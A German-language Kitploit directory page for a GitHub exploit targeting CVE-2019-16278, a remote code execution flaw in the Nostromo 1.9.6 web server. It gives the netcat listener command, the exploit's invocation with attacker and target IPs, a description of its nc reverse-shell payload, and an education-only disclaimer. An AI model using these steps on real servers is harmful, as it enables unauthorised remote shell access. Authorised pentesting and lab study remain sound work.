Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-16278-Nostromo-1.9.6-RCE — Dieses Repository enthält einen Exploit für CVE-2019-16278 im Nostromo Web Server 1.9.6, der Remote-Codeausführung über eine Directory-Traversal-Sicherheitslücke ermöglicht. Das Skript verwendet pwntools, um eine Reverse Shell herzustellen. Nur für Bildungszwecke und autorisierte Tests. | Kitploit
Tools/GitHubGitHub/cancela24/cve-2019-16278-nostromo-1.9.6-rce
Payload-GenerierungExploitationShellcodeWebanwendungs-ExploitationLernen & BildungRemote-Access-Tool
GitHubcancela24/cve-2019-16278-nostromo-1.9.6-rce

CVE-2019-16278-Nostromo-1.9.6-RCE

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

1vor 1 JahrNoch nicht geprüft

Dieses Repository enthält einen Exploit für CVE-2019-16278 im Nostromo Web Server 1.9.6, der Remote-Codeausführung über eine Directory-Traversal-Sicherheitslücke ermöglicht. Das Skript verwendet pwntools, um eine Reverse Shell herzustellen. Nur für Bildungszwecke und autorisierte Tests.

Teilen

CVE-2019-16278-Nostromo-1.9.6-RCE

Dieses Repository enthält einen Exploit für CVE-2019-16278 im Nostromo Web Server 1.9.6, der Remote-Code-Ausführung über eine Directory-Traversal-Schwachstelle ermöglicht. Das Skript verwendet pwntools, um eine Reverse-Shell herzustellen. Nur für Bildungszwecke und autorisierte Tests.

Voraussetzungen

  • Python 3.x
  • pwntools-Bibliothek

Um pwntools zu installieren, verwenden Sie:

root@kitploit:~
pip3 install pwntools

Verwendung

Einrichtung

  1. Listener starten: Starten Sie auf dem Angreifer-Rechner einen Listener auf dem angegebenen Port, um die Reverse-Shell zu empfangen:

    root@kitploit:~
    nc -lvnp <angreifer-port>
    
  2. Skript ausführen: Verwenden Sie den folgenden Befehl, um das Exploit-Skript auszuführen. Ersetzen Sie die Werte nach Bedarf.

    root@kitploit:~
    python3 exploit.py --attacker-ip <angreifer-ip> --attacker-port <angreifer-port> [-t ziel-ip] [-p ziel-port]
    

Beispiel

root@kitploit:~
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80

In diesem Beispiel:

  • --attacker-ip 10.10.14.15 ist die IP-Adresse des Angreifer-Rechners.
  • --attacker-port 4444 ist der Port, auf dem der Angreifer-Rechner auf die Reverse-Shell wartet.
  • -t 10.10.10.165 gibt die Ziel-IP an (Standard ist 10.10.10.165).
  • -p 80 gibt den Ziel-Port an (Standard ist 80).

Skript-Optionen

Skriptablauf

  1. Warnhinweis: Erinnert den Benutzer daran, einen Listener auf dem Angreifer-Rechner zu starten.
  2. Payload-Konstruktion: Erstellt eine HTTP-Anfrage mit dem Reverse-Shell-Befehl unter Verwendung von netcat (nc).
  3. Payload-Ausführung: Sendet den Payload an den Zielserver und versucht, eine Reverse-Shell zu empfangen.
  4. Wiederholungen: Schlägt der erste Versuch fehl, wiederholt das Skript bis zu 3 Mal mit Rückmeldung zu jedem Versuch.

Beispiel eines Code-Ablaufs

Bei Erfolg sollten Sie eine Reverse-Shell auf Ihrem Listener erhalten, die Zugriff auf das Zielsystem gewährt.

Haftungsausschluss

Dieses Skript ist nur für Bildungszwecke und autorisierte Tests bestimmt. Der unbefugte Zugriff auf Computersysteme ist illegal. Der Autor und die Mitwirkenden sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden. Nutzen Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine Testberechtigung haben.

Tool herunterladen
OptionBeschreibungStandard
-t, --targetIP-Adresse des entfernten Hosts10.10.10.165
-p, --portPort auf dem entfernten Host, der angegriffen werden soll80
--attacker-ipIP-Adresse des Angreifer-Rechners für die Reverse-ShellKeine (erforderlich)
--attacker-portPort auf dem Angreifer-Rechner für die Reverse-ShellKeine (erforderlich)